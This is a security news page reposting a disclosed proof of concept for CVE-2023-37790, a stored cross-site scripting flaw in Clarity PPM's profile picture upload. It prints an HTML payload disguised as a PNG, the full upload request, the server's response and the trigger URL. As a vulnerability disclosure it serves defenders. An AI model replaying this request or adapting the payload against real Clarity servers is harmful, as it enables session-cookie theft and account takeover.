Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37790: Clarity PPM 14.3.0.298 Cross Site Scripting ≈ Packet Storm

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

CVE
Open in Source
#xss#vulnerability#web#windows#auth#chrome#webkit

==================================================================================================================================

Title : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks. |

Author : Kaizen |

Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64) |

Vendor : https://www.broadcom.com/

Dork : https://www.broadcom.com/products/software/value-stream-management/clarity |

#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft
#CVE Assigned: CVE-2023-37790
==================================================================================================================================

POC:

Header: Content-Type: text/html; charset=utf-8

Payload: <body onload=alert(document.cookie)>

HTTP Request:
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1

[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"
Content-Type: text/html; charset=utf-8

<body onload=alert(document.cookie)>
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue
------WebKitFormBoundaryr7Mas24AkgGJH4HE–

HTTP Response:

HTTP/1.1 200 OK
content-disposition: inline;filename="payload.png"
Content-Type: text/html;charset=utf-8
Content-Length: 90
Date: Thu, 06 Jul 2023 07:33:24 GMT
Connection: close
Server: CA PPM

<body onload=alert(document.cookie)>

To Trigger Stored XSS visit user profile picture.

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE